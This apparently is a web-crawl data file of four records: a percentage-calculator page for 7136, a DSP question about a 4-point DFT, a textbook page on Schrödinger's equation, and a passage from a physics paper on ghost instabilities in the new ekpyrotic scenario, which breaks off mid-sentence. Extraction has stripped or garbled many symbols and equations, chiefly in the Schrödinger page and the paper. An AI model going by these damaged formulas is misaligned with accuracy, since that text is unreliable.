[ "Percentage Calculator\n\n# How calculate 30% of 7136?\n\nA simple way to calculate percentages of X\n\n 30% of 7136 = 2140.8 7136 + 30% = 9276.8 7136 - 30% = 4995.2\n What is Calculate the percentage: %\n\nIn the store, the product costs 7136, you were given a discount 30 and you want to understand how much you saved.\n\nSolution:\n\nAmount saved = Product price * Percentage Discount/ 100\n\nAmount saved = (30 * 7136) / 100\n\nMore random interest calculations:\n9% от 7136 = 642.24\n7136 + 9% = 7778.24\n7136 - 9% = 6493.76\n19% от 7136 = 1355.84\n7136 + 19% = 8491.84\n7136 - 19% = 5780.16\n20% от 7136 = 1427.2\n7136 + 20% = 8563.2\n7136 - 20% = 5708.8\n37% от 7136 = 2640.32\n7136 + 37% = 9776.32\n7136 - 37% = 4495.68\n48% от 7136 = 3425.28\n7136 + 48% = 10561.28\n7136 - 48% = 3710.72\n58% от 7136 = 4138.88\n7136 + 58% = 11274.88\n7136 - 58% = 2997.12\n65% от 7136 = 4638.4\n7136 + 65% = 11774.4\n7136 - 65% = 2497.6\n73% от 7136 = 5209.28\n7136 + 73% = 12345.28\n7136 - 73% = 1926.72\n82% от 7136 = 5851.52\n7136 + 82% = 12987.52\n7136 - 82% = 1284.48\n94% от 7136 = 6707.84\n7136 + 94% = 13843.84\n7136 - 94% = 428.16\n\nAnd what if the percentage is more than 100? Then the resulting result will be greater than the sum itself7136. For example:\n200% от 7136 = 14272\n500% от 7136 = 35680\n800% от 7136 = 57088" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5540529,"math_prob":0.99986017,"size":1623,"snap":"2022-27-2022-33","text_gpt3_token_len":828,"char_repetition_ratio":0.2470661,"word_repetition_ratio":0.33707866,"special_character_ratio":0.78866297,"punctuation_ratio":0.1671159,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999137,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-16T18:37:13Z\",\"WARC-Record-ID\":\"<urn:uuid:4b4c49d5-39af-47f1-8b4a-2441fee47b00>\",\"Content-Length\":\"27473\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4e22940a-9b66-4267-9bdc-d8f0aaccb74d>\",\"WARC-Concurrent-To\":\"<urn:uuid:d04f3440-6863-45df-aa6e-88b01d49e9b2>\",\"WARC-IP-Address\":\"80.249.131.100\",\"WARC-Target-URI\":\"https://percent-calculation.com/skolko-30-7136\",\"WARC-Payload-Digest\":\"sha1:TKOAX6QETZ64FUHASQHX7H7RXR4FJNOA\",\"WARC-Block-Digest\":\"sha1:YPEQBZYKTQUCL35BFCYQI5MUA23O2GQQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572515.15_warc_CC-MAIN-20220816181215-20220816211215-00132.warc.gz\"}"}
https://dsp.stackexchange.com/questions/16392/how-to-sample-sine-wave-to-4-points-dft-output
[ "# how to sample sine wave to 4 points dft output\n\nsinusoid x(t)=1+sin(2*pi *500) sampling rate :1000 samples/s Can I have 4 points DFT output with the above data.\n\n$x(t)=1+sin(2*pi *500)$ is a sinusoidal signal with frequency 500 Hz and the sampling rate is 1000 Hz. So you have 1000 samples/sec and 500 cycles/sec." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87140185,"math_prob":0.9993069,"size":582,"snap":"2020-45-2020-50","text_gpt3_token_len":159,"char_repetition_ratio":0.13494809,"word_repetition_ratio":0.0,"special_character_ratio":0.2869416,"punctuation_ratio":0.07438017,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99412525,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-29T17:14:03Z\",\"WARC-Record-ID\":\"<urn:uuid:185c8603-eaf5-4ea6-8744-7c0eb4189bb9>\",\"Content-Length\":\"147806\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2def29f8-46da-49ac-b0df-e5acd2760c88>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2d33320-eb67-4178-8816-b58c12dd2e50>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://dsp.stackexchange.com/questions/16392/how-to-sample-sine-wave-to-4-points-dft-output\",\"WARC-Payload-Digest\":\"sha1:7KEDV7JX7JRMRISHKABBOMDKCSHNSENC\",\"WARC-Block-Digest\":\"sha1:JJRRDC6HLRWGENZZB5D4QSQ6AIX5HOMI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141201836.36_warc_CC-MAIN-20201129153900-20201129183900-00485.warc.gz\"}"}
https://farside.ph.utexas.edu/teaching/qmech/Quantum/node33.html
[ "", null, "", null, "", null, "Next: Normalization of the Wavefunction Up: Fundamentals of Quantum Mechanics Previous: Introduction\n\n# Schrödinger's Equation\n\nConsider a dynamical system consisting of a single non-relativistic particle of mass", null, "moving along the", null, "-axis in some real potential", null, ". In quantum mechanics, the instantaneous state of the system is represented by a complex wavefunction", null, ". This wavefunction evolves in time according to Schrödinger's equation:", null, "(137)\n\nThe wavefunction is interpreted as follows:", null, "is the probability density of a measurement of the particle's displacement yielding the value", null, ". Thus, the probability of a measurement of the displacement giving a result between", null, "and", null, "(where", null, ") is", null, "(138)\n\nNote that this quantity is real and positive definite.\n\nRichard Fitzpatrick 2010-07-20" ]
[ null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/next.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/up.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/prev.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img297.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img4.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img436.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img147.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img442.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img316.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img4.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img10.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img456.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img457.png", null, "https://farside.ph.utexas.edu/teaching/qmech/Quantum/img458.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8514559,"math_prob":0.9564998,"size":750,"snap":"2021-43-2021-49","text_gpt3_token_len":161,"char_repetition_ratio":0.112600535,"word_repetition_ratio":0.018518519,"special_character_ratio":0.20266667,"punctuation_ratio":0.09166667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9946713,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,5,null,null,null,null,null,3,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T22:12:41Z\",\"WARC-Record-ID\":\"<urn:uuid:67342929-7f9a-4fe9-a2fa-a78550812f35>\",\"Content-Length\":\"4696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2858a753-96b2-4f8b-b086-af46769147d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:60df0721-37c3-4edb-aa86-2905909053b6>\",\"WARC-IP-Address\":\"146.6.100.132\",\"WARC-Target-URI\":\"https://farside.ph.utexas.edu/teaching/qmech/Quantum/node33.html\",\"WARC-Payload-Digest\":\"sha1:IQ7VS4CD25XHMJKVWNAHPVZ2CE4Q7YQP\",\"WARC-Block-Digest\":\"sha1:B4J7EIAIRRKHDHUV52LXKI7FCUPIMDYS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585183.47_warc_CC-MAIN-20211017210244-20211018000244-00541.warc.gz\"}"}
https://www.arxiv-vanity.com/papers/0712.2040/
[ "The New Ekpyrotic Ghost\n\nRenata Kallosh, Jin U Kang, Andrei Linde and Viatcheslav Mukhanov\n\nDepartment of Physics, Stanford University, Stanford, CA 94305, USA\n\nArnold-Sommerfeld-Center for Theoretical Physics, Department für Physik, Ludwig-Maximilians-Universität München, Theresienstr. 37, D-80333, Munich, Germany\n\nDepartment of Physics, Kim Il Sung University, Pyongyang, DPR. Korea\n\nThe new ekpyrotic scenario attempts to solve the singularity problem by involving violation of the null energy condition in a model which combines the ekpyrotic/cyclic scenario with the ghost condensate theory and the curvaton mechanism of production of adiabatic perturbations of metric. The Lagrangian of this theory, as well as of the ghost condensate model, contains a term with higher derivatives, which was added to the theory to stabilize its vacuum state. We found that this term may affect the dynamics of the cosmological evolution. Moreover, after a proper quantization, this term results in the existence of a new ghost field with negative energy, which leads to a catastrophic vacuum instability. We explain why one cannot treat this dangerous term as a correction valid only at small energies and momenta below some UV cut-off, and demonstrate the problems arising when one attempts to construct a UV completion of this theory.\n\n## 1 Introduction: Inflation versus Ekpyrosis\n\nAfter more than 25 years of its development, inflationary theory gradually becomes a standard cosmological paradigm. It solves many difficult cosmological problems and makes several predictions, which are in a very good agreement with observational data. There were many attempts to propose an alternative to inflation. In general, this could be a very healthy tendency. If one of these attempts will succeed, it will be of great importance. If none of them are successful, it will be an additional demonstration of the advantages of inflationary cosmology. However, since the stakes are high, we are witnessing a growing number of premature announcements of success in developing an alternative cosmological theory.\n\nAn instructive example is given by the ekpyrotic scenario . The authors of this scenario claimed that it can solve all cosmological problems without using the stage of inflation. However, the original ekpyrotic scenario did not work. It is sufficient to say that the large mass and entropy of the universe remained unexplained, instead of solving the homogeneity problem this scenario only made it worse, and instead of the big bang expected in , there was a big crunch [2, 3].\n\nSoon after that, the ekpyrotic scenario was replaced by the cyclic scenario, which used an infinite number of periods of expansion and contraction of the universe . Unfortunately, the origin of the scalar field potential required in this model, as well as in , remains unclear, and the very existence of the cycles postulated in has not been demonstrated. When this scenario was analyzed using the particular potential given in and taking into account the effect of particle production in the early universe, a very different cosmological regime was found [5, 6].\n\nThe most difficult of the problems facing this scenario is the problem of the cosmological singularity. Originally there was a hope that the cosmological singularity problem will be solved in the context of string theory, but despite the attempts of the best experts in string theory, this problem remains unsolved [7, 8, 9]. Recently there were some developments in the analysis of this problem using the AdS/CFT correspondence , but the results rely on certain conjectures and apply only to five dimensional space. As the authors admit, “precise calculations are currently beyond reach” for the physically interesting four dimensional space-time. This issue was previously studied in , where it was concluded that “In our study of the field theory evolution, we find no evidence for a bounce from a big crunch to a big bang.”\n\nIn this paper we will discuss the recent development of this theory, called ‘the new ekpyrotic scenario’ [12, 13, 14, 15], which created a new wave of interest in the ekpyrotic/cyclic ideas. This is a rather complicated scenario, which attempts to solve the singularity problem by involving violation of the null energy condition (NEC) in a model which combines the ekpyrotic scenario with the ghost condensate theory and the curvaton mechanism of production of adiabatic perturbations of metric [17, 18].\n\nUsually the NEC violation leads to a vacuum instability, but the authors of [12, 13, 14, 15] argued that the instability occurs only near the bounce, so it does not have enough time to fully develop. The instability is supposed to be dampened by higher derivative terms of the type (the sign is important, see below), which were added to the action of the ghost condensate in . These terms are absolutely essential in the new ekpyrotic theory for stabilization of the vacuum against the gradient and Jeans instabilities near the bounce.\n\nHowever, these terms are quite problematic. Soon after introducing them, the authors of the ghost condensate theory, as well as several others, took a step back and argued that these terms cannot appear in any consistent theory, that the ghost condensate theory is ultraviolet-incomplete, that theories of this type lead to violation of the second law of thermodynamics, allow construction of a perpetuum mobile of the 2nd kind, and therefore they are incompatible with basic gravitational principles [19, 20, 21, 22].\n\nThese arguments did not discourage the authors of the new ekpyrotic theory and those who followed it, so we decided to analyze the situation in a more detailed way. First of all, we found that the higher derivative terms were only partially taken into account in the investigation of perturbations, and were ignored in the investigation of the cosmological evolution in [12, 13, 14, 15]. Therefore the existence of consistent and stable bouncing solutions postulated in the new ekpyrotic scenario required an additional investigation. We report the results of this investigation in Section 6.\n\nMore importantly, we found that these additional terms lead to the existence of new ghosts, which have not been discussed in the ghost condensate theory and in the new ekpyrotic scenario [12, 13, 14, 15, 16]. In order to distinguish these ghosts from the relatively harmless condensed ghosts of the ghost condensate theory, we will call them ekpyrotic ghosts, even though, as we will show, they are already present in the ghost condensate theory. These ghosts lead to a catastrophic vacuum instability, quite independently of the cosmological evolution. In other words, the new ekpyrotic scenario, as well as the ghost condensate theory, appears to be physically inconsistent. But since the new ekpyrotic scenario, as different from the ghost condensate model, claims to solve the fundamental singularity problem by justifying the bounce solution, the existence of the ekpyrotic ghosts presents a much more serious problem for the new ekpyrotic scenario with such an ambitious goal. We describe this problem in Sections 2, 3, 4, 5, and 7.\n\nFinally, in Appendix we discuss certain attempts to save the new ekpyrotic scenario. One of such attempts is to say that this scenario is just an effective field theory which is valid only for sufficiently small values of frequencies and momenta. But then, of course, one cannot claim that this theory solves the singularity problem until its consistent UV completion with a stable vacuum is constructed. For example, we will show that if one simply ignores the higher derivative terms for frequencies and momenta above a certain cutoff, then the new ekpyrotic scenario fails to work because of the vacuum instability which is even much stronger than the ghost-related instability. We will also describe a possible procedure which may provide a consistent UV completion of the theory with higher derivative terms of the type . Then we explain why this procedure fails for the ghost condensate and the new ekpyrotic theory where the sign of the higher derivative term must be negative.\n\n## 2 Ghost condensate and new ekpyrosis: The basic scenario\n\nThe full description of the new ekpyrotic scenario is pretty involved. It includes two fields, one of which, , is responsible for the ekpyrotic collapse, and another one, , is responsible for generation of isocurvature perturbations, which eventually should be converted to adiabatic perturbations. Both fields must have quite complicated potentials, which can be found e.g. in . For the purposes of our discussion it is sufficient to consider a simplified model containing only one field, . The simplest version of this scenario can be written as follows:\n\n L=√g[M4P(X)−12(□ϕM′)2−V(ϕ)], (1)\n\nwhere is dimensionless. is a dimensionless function which has a minimum at . The first two terms in this theory represent the theory of a ghost condensate, the last one is the ekpyrotic potential. This potential is very small and very flat at large , so for large this theory is reduced to the ghost condensate model of .\n\nThe ghost condensate state corresponds to the minimum of . Without loss of generality one may assume that this minimum occurs at , i.e. at , , so that . As a simplest example, one can consider a function which looks as follows in the vicinity of its minimum:\n\n P(X)=12(X−1/2)2 . (2)\n\nThe term was added to the Lagrangian in for stabilization of the fluctuations of the field in the vicinity of the background solution ; more about it later.\n\nThis theory was represented in several different ways in [16, 12, 13, 14, 15], where a set of parameters such as and was introduced. The parameter can always be absorbed in a redefinition of ; in our notation, .\n\nThe equation for the homogeneous background can be represented as follows:\n\n ∂t[a3(P,X˙ϕ+∂t(¨ϕ+3H˙ϕ)m2g)]=−a3V,ϕm4M4 , (3)\n\nwhere we introduced the notation\n\n mg=M′M2m2 . (4)\n\nThe meaning of this notation will be apparent soon.\n\nThe complete equation describing the dependence on the spatial coordinates is\n\n ∂t[a3(P,X∂tϕ+∂t(□ϕ)m2g)]−∂i[a(P,X∂iϕ+∂i(□ϕ)m2g)]=−a3V,ϕm4M4. (5)\n\nInstead of solving these equations, the authors of [12, 13, 14, 15] analyzed (though not solved) equation (3) ignoring the higher derivative term , assuming that it is small. Then they analyzed equation (5), applying it to perturbations, ignoring the term , but keeping the term , assuming that it is large. Our goal is to see what happens if one performs an investigation in a self-consistent way.\n\nIn order to do this, let us temporarily assume that the higher derivative term is absent, which corresponds to the limit . In this case our equation for reduces to the equation used in [12, 13, 14, 15]\n\n ∂t[a3P,X˙ϕ]=−a3V,ϕm4/M4 . (6)\n\nOne of the Einstein equations, in the same approximation, is\n\n ˙H=−12(ε+p)=−M4P,XX=−M4X(X−1/2) , (7)\n\nwhere is the energy density and is the pressure. (We are using the system of units where .)\n\nThe null energy condition (NEC) requires that , and . Therefore a collapsing universe with cannot bounce back unless NEC is violated. It implies that the bounce can be possible only if becomes negative, , i.e. the field should become smaller than .\n\nIt is convenient to represent the general solution for as\n\n ϕ(t)=−m2t+π0(t)+π(xi,t) , (8)\n\nwhere satisfies equation\n\n ¨π0+3H˙π0=−m4M4V,ϕ . (9)\n\nIn this case one can show that the perturbations of the field have the following spectrum at small values of :\n\n ω2=P,Xk2 . (10)\n\nThis means that plays in this equation the same role as the square of the speed of sound. For small , one has\n\n c2s=P,X . (11)\n\nThe ghost condensate point , which separates the region where NEC is satisfied and the region where it is violated, is the point where the perturbations are frozen. The real disaster happens when one crosses this border and goes to the region with , which corresponds to . In this area the NEC is violated, and, simultaneously, perturbations start growing exponentially,\n\n πk(t)∼exp(√|c2s||k|t)∼exp(√|P,X||k|t) . (12)\n\nThis is a disastrous gradient instability, which is much worse than the usual tachyonic instability. The tachyonic instability develops as , so its rate is limited by the tachyonic mass, and it occurs only for . Meanwhile the instability (12) occurs at all momenta , and the rate of its development exponentially grows with the growth of . This makes it abundantly clear how dangerous it is to violate the null energy condition.\n\nThat is why it was necessary to add higher derivative terms of the type of to the ghost condensate Lagrangian : The hope was that such terms could provide at least some partial protection by changing the dispersion relation.\n\nSince we are interested mostly in the high frequency effects corresponding to the rapidly developing instability, let us ignore for a while the gravitational effects, which can be achieved by taking , . In this case, the effective Lagrangian for perturbations of the field in a vicinity of the minimum of (i.e. for small ) is\n\n L=M4m4[12˙π2−12P,X(∇π)2−12m2g(□π)2] . (13)\n\nThe equation of motion for the field is\n\n ¨π−P,X∇2π+1m2g□2π=0 . (14)\n\nAt small frequencies , which is the case analyzed in , the dispersion relation corresponding to this equation looks as follows:\n\n ω2=P,Xk2+k4m2g . (15)\n\nThis equation implies that the instability occurs only in some limited range of momenta , which can be made small if the parameter is sufficiently small and, therefore, the higher derivative therm is sufficiently large. This is the one of the main assumptions of the new ekpyrotic scenario: If the violation of the NEC occurs only during a limited time near the bounce from the singularity, one can suppress the instability by adding a sufficiently large term . (This term must have negative sign, because otherwise it does not protect us from the gradient instability. This will be important for the discussion in Appendix.)\n\nNote that one cannot simply add the higher derivative term and take it into account only up to some cut-off . For example, if we “turn on” this term only at , it is not going to save us from the gradient instability which occurs at for all unlimitedly large in the region where the NEC is violated and .\n\nThere are several different problems associated with this scenario. First of all, in order to tame the instability during the bounce one should add a sufficiently large term , which leads to the emergence of the term in the equation for . But if this term is large, then one should not discard it in the equations for the homogeneous scalar field and in the Einstein equations, as it was done in [12, 13, 14, 15].\n\nThe second problem is associated with the way the higher derivative terms were treated in [16, 12, 13, 14, 15]. The dispersion relation studied there was incomplete. The full dispersion relation for the perturbations in the theory (13), (14) is\n\n ω2=P,Xk2+(ω2−k2)2m2g . (16)\n\nThis equation coincides with eq. (15) in the limit of small studied in [16, 12, 13, 14, 15]. However, this equation has two different branches of solutions, which we will present, for simplicity, for the case corresponding to the minimum of the ghost condensate potential :\n\n ω=± ωi ,i=1,2, (17)\n\nwhere\n\n ω1=12(√m2g+4k2−mg), (18)\n ω2=12(√m2g+4k2+mg). (19)\n\nAt high momenta, for , the spectrum for all 4 solutions is nearly the same\n\n ω≈±|k| . (20)\n\nAt small momenta, for , one has two types of solutions: The lower frequency solution, which was found in , is\n\n ω=± k2/mg . (21)\n\nBut there is also another, higher frequency solution,\n\n ω=± mg . (22)\n\nThe reason for the existence of an additional branch of solutions is very simple. Equation for the field in the presence of the term with the higher derivatives is of the fourth order. To specify its solutions it is not sufficient to know the initial conditions for the field and its first derivative, one must know also the initial conditions for the second and the third derivatives. As a result, a single equation describes two different degrees of freedom.\n\nTo find a proper interpretation of these degrees of freedom, one must perform their quantization. This will be done in the next two sections. As we will show in these sections, the lower frequency solution corresponds to normal particles with positive energy , whereas the higher frequency solution corresponds to ekpyrotic ghosts with negative energy . The quantity has the meaning of the ghost mass: it is given by the energy at and it is negative.\n\n## 3 Hamiltonian quantization\n\nWe see that our equations for have two sets of solutions, corresponding to states with positive and negative energy. As we will see now, some of them correspond to normal particles, some of them are ghosts. We will find below that the Hamiltonian based on the classical Lagrangian in eq. (13) is\n\n Hquant=∫d3k(2π)3(ω1a†kak−ω2c†kck) . (23)\n\nThe expressions for and will be presented below for the case of generic , for they are given in eqs. (18) and (19). Both and are positive, therefore and are creation/annihilation operators of normal particles whereas and are creation/annihilation operators of ghosts.\n\nWe will perform the quantization starting with the Lagrangian in eq. (13), with an arbitrary speed of sound, . The case is the Lorentz invariant Lagrangian. The case is the case considered in the previous section and appropriate to the ghost condensate and the new ekpyrotic scenario at the minimum of .\n\nBy rescaling the field we have\n\n L=12(∂μπ∂μπ+(c2s−1)πΔπ−1m2g(□π)2). (24)\n\nThis is the no-gravity theory considered in the previous section. Note that the ghost condensate set up is already build in, the negative kinetic term for the original ghost is eliminated by the condensate. The existence of higher derivatives was only considered in [12, 13, 14, 15, 16] as a ‘cure’ for the problem of stabilizing the system after the original ghost condensation. As we argued in the previous section, this ‘cure’ brings in a new ghost, which remained unnoticed in [12, 13, 14, 15, 16]. In this section, as well as in the next one, we will present a detailed derivation of this result. Because of the presence of higher derivatives in the Lagrangian, the Hamiltonian quantization of this theory is somewhat nontrivial. It can be performed by the method invented by Ostrogradski .\n\nThus we start with the rescaled eq. (13)\n\n L=12[˙π2−c2s(∇xπ)2−1m2g(□π)2] . (25)\n\nThe equation of motion for the field is\n\n ¨π−c2s∇2xπ+1m2g□2π=0 . (26)\n\nIf the Lagrangian depends on the field and on its first and second time derivatives, the general procedure is the following. Starting with , one defines 2 canonical degrees of freedom, and :\n\n q1≡π ,p1=∂L∂˙q1−ddt∂L∂¨q1 , q2≡˙π ,p2=∂L∂¨q1 . (27)\n\nThe canonical Hamiltonian is\n\n H=p1˙q1+p2˙q2−L(q1,q2,˙q1,˙q2) . (28)\n\nThe canonical Hamiltonian equations of motion,\n\n ˙qi=∂H∂pi ,˙pi=−∂H∂qi ,i=1,2 , (29)\n\nare standard; they exactly reproduce the Lagrangian equation of motion (26). The quantization procedure requires promoting the Poisson brackets to commutators which allows to identify the spectrum. There are many known examples of the Ostrogradski procedure of derivation of the canonical Hamiltonian, see for example [24, 25].\n\nThe Hamiltonian density constructed by the Ostrogradski procedure for the Lagrangian (25) is\n\n Hcl(→x,t)=12[p21−(p1−q2)2−m2g(p2−1m2g∇2xq1)2+c2s(∇xq1)2+1m2g(∇2xq1)2] . (30)\n\nThe next step in quantization is to consider the ansatz for the solution of classical equations of motion in the form\n\n q1(→x,t)=∫d3k(2π)3[f1k√2ω1e−ik1x+f2k√2ω2eik2x+cc], (31)\n\nwhere , and . We impose the Poisson brackets\n\n {qi,pj}=δij (32)\n\nand promote them to commutators of the type\n\n [qi(→x,t),pj(→x′,t)]=iδijδ3(→x−→x′) . (33)\n\nThis quantization condition requires to promote the solution of the classical equation (31) to the quantum operator form, where\n\n f1k=akmg√ω22−ω21,f2k=ckmg√ω22−ω21 , (34)\n\nand we impose normal commutation relation both on particles with creation and annihilation operators and and ghosts, and :\n\n [ak,a†k′]=(2π)3δ3(→k−→k′) ,[ck,c†k′]=(2π)3δ3(→k−→k′) . (35)\n\nHere\n\n ω1(k2;mg,c2s)=⎛⎝k2+m2g2−√k2m2g(1−c2s)+m4g4⎞⎠1/2 (36)\n\nand\n\n ω2(k2;mg,c2s)=⎛⎝k2+m2g2+√k2m2g(1−c2s)+m4g4⎞⎠1/2 (37)\n\nThe Hamiltonian operator acquires a very simple form\n\n Hquant=12∫d3k(2π)3(ω1(a†kak+aka†k)−ω2(c†kck+ckc†k))=∫d3k(2π)3(ω1a†kak−ω2c†kck+C) . (38)\n\nHere the infinite term is equal to . It represents the infinite shift of the vacuum energy due to the sum of all modes of the zero-point energies and is usually neglected in quantum field theory. Apart from this infinite -number this is an expression promised in eq. (23).\n\nWe now define the vacuum state as the state which is annihilated both by the particle as well as by the ghosts annihilation operators, . Thus the energy operator acting on a state of a particle has positive value and on a state of a ghost has the negative value111One could use an alternative way of ghost quantization, by changing the sign of their commutator relations. In this case the ghosts would have positive energy, but this would occur at the expense of introducing a nonsensical notion of negative probabilities.\n\n Hquanta†k|0⟩=ω1(k)a†k|0⟩ ,Hquantc†k|0⟩=−ω2(k)c†k|0⟩ . (39)\n\nThis confirms the physical picture outlined at the end of the previous section.\n\n## 4 Lagrangian quantization\n\nThe advantage of the Hamiltonian method is that it gives an unambiguous definition of the quantum-mechanical energy operator, which is negative for ghosts. This is most important for our subsequent analysis of the vacuum instability in the new ekpyrotic scenario. However, it is also quite instructive to explain the existence of the ghost field in new ekpyrotic scenario using the Lagrangian approach. The Lagrangian formulation is very convenient for coupling of the model to gravity.\n\nUsing Lagrangian multiplier, one can rewrite eq. (24) as\n\n L=12(∂μπ∂μπ+(c2s−1)πΔπ−B2m2g)+λ(B−□π). (40)\n\nVariation with respect to gives . After substituting in (40) and skipping total derivative we obtain\n\n L = 12(∂μπ∂μπ+(c2s−1)πΔπ+B2m2g)+1m2g∂μB∂μπ (41) = 12∂μ(π+2Bm2g)∂μπ+B22m2g+12(c2s−1)πΔπ .\n\nIntroducing new variables according to\n\n σ+ξ = π+2Bm2g, σ−ξ = π ,\n\nand substituting in (41) we obtain\n\n L=12(∂μσ∂μσ−∂μξ∂μξ+m2gξ2)+12(c2s−1)(σ−ξ)Δ(σ−ξ) . (42)\n\nIn the case we have two decoupled scalar fields: massive with negative kinetic energy and massless with positive kinetic energy.\n\n Lc2s=1=12(∂μσ∂μσ−∂μξ∂μξ+m2gξ2) . (43)\n\nFor the homogeneous field ( mode) the Lagrangian does not depend on and is reduced to\n\n (44)\n\nThe relation between the mode of the original field , the normal field and the ghost field is\n\n σ=π+ξ ,ξ=¨πm2g . (45)\n\nWhen and these fields still couple. To diagonalize the Lagrangian in eq. (24) and decouple the oscillators we have to go to normal coordinates, similar to the case of the classical mechanics of coupled harmonic oscillators. For that we need to solve the eigenvalue problem and find the eigenfrequencies of the oscillators. Let us consider the modes with the wavenumbers For such modes we can perform the following change of variables\n\n σk≡¨πk+ω22πkmg√ω22−ω21 ,ξk≡¨πk+ω21πkmg√ω22−ω21 , (46)\n\nwhere are defined in eqs. (36), (37). In the special case of the answers for simplify and are shown in eqs. (18) and (19). After a change of variables we find for these modes in the momentum space\n\n ~Lc2s=12(.σk.σ−k−ω21σkσ−k−.ξk.ξ−k+ω22ξkξ−k). (47)\n\nThe modes of are normal, and the modes of are ghosts. Using this Lagrangian, one can easily confirm the final result of the Hamiltonian quantization given in the previous section.222After we finished this paper, we learned that the Lagrangian quantization of the ghost condensate scenario was earlier performed by Aref’eva and Volovich for the case , and they also concluded that this scenario suffers from the existence of ghosts. When our works overlap, our results agree with each other. We use the Lagrangian approach mainly to have an alternative derivation of the results of the Hamiltonian quantization. The Hamiltonian approach clearly establishes the energy operator and the sign of its eigenvalues, which is necessary to have an unambiguous proof that the energy of the ghosts is indeed negative and the ghosts do not disappear at non-vanishing when the ekpyrotic universe is out of the ghost condensate minimum. The classical mode is associated with creation/annihilation operators of normal particles after quantization and the classical mode is associated with creation/annihilation operators of ghosts particles after quantization. A quantization of the theory in eq. (47) leads to the Hamiltonian in eq. (23).\n\n## 5 Energy-momentum tensor and equations of motion\n\nFirst, we will compute the energy-momentum tensor (EMT) of the Lagrangian (42) using the Noether procedure:\n\n Tμν=∂L∂(∂μφ)∂νφ−Lημν,\n\nwhere is Minkowski metric. We find\n\n Tμν = ∂μσ∂νσ−∂μξ∂νξ+ημi(c2s−1)∂i(σ−ξ)∂ν(σ−ξ) (48) −ημν(12(∂ασ∂ασ−∂αξ∂αξ+m2gξ2)+12(c2s−1)∂i(σ−ξ)∂i(σ−ξ)).\n\nThe energy density is\n\n ε=T00=12[˙σ2+(∂iσ)2−˙ξ2−(∂iξ)2−m2gξ2+(c2s−1)(∂i(σ−ξ))2].\n\nFor the homogeneous field ( mode), the energy density can be split into two parts, i.e. a normal field part and an ekpyrotic ghost field part:\n\n ε=εσ+εξ,\n\nwhere\n\n εσ=12˙σ2>0,εξ=−12˙ξ2−12m2gξ2<0 .\n\nThus the energy of the ghost field is negative.\n\nUp to now we have turned off gravity. In the presence of gravity, the energy-momentum tensor of the full Lagrangian (1) in Sec. 2 is calculated by varying the action with respect to the metric:\n\n Tμν = gμν[−M4P(X)−(□ϕ)22M′2+V(ϕ)−∂α(□ϕ)∂αϕM′2] (49) +M4m−4P,X∂μϕ∂νϕ+M′−2(∂μ(□ϕ)∂νϕ+∂ν(□ϕ)∂μϕ) ≡ gμν[−M4P(X)−M′2Y22+V(ϕ)−∂αY∂αϕ] +M4m−4P,X∂μϕ∂νϕ+∂μY∂νϕ+∂νY∂μϕ ,\n\nwhere\n\n Y≡M′−2□ϕ . (50)\n\nFrom this, for a homogeneous, spatially flat FRW space time we have the energy density\n\n ε=M4(2P,XX−P(X))+V(ϕ)−M′2Y22+˙Y˙ϕ (51)\n\nand the pressure\n\n p=M4P(X)−V(ϕ)+M′2Y22+˙Y˙ϕ , (52)\n\nso that\n\n ˙H=−12(ε+p)=−M4P,XX−˙Y˙ϕ . (53)\n\nNote that in the homogeneous case in the absence of gravity the ekpyrotic ghost field as defined in eq. (45) is directly proportional to the field :\n\n ξ=m2M2 Y . (54)\n\nThe closed equations of motion, which we used for our numerical analysis, are obtained as follows:\n\n ¨ϕ(P,X+2XP,XX)+3HP,X˙ϕ+m4M4(¨Y+3H˙Y) = −V,ϕm4/M4 ,\n ˙H=−M4P,X˙ϕ22m4−˙Y˙ϕ , (55)\n M′−2(¨ϕ+3H˙ϕ)=Y .\n\nHere .\n\nIn these equations the higher derivative corrections appear in the terms containing the derivatives of . The last of these equations shows that in the limit (i.e. 